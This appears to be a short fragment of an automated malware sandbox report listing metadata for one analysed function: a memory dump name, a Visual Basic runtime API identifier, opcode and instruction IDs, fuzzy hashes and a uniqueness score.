                                                      • Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: __vba$#584ChkstkCopyFree
                                                      • String ID:
                                                      • API String ID: 3519716879-0
                                                      • Opcode ID: 80edf9c7639351e3800ba2d18ec55b890a72b969b598f8c9298005737cc6cdd8
                                                      • Instruction ID: 15d200c960d8d0cd224b9cd72909cc597d79f8a8b94c26f69f4931513196bdc8
                                                      • Opcode Fuzzy Hash: 80edf9c7639351e3800ba2d18ec55b890a72b969b598f8c9298005737cc6cdd8
                                                      • Instruction Fuzzy Hash: A5F08130800109ABC704EF92C946B9E7FB9EF08744F00847BB1406B1E1C77C5950CBD8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%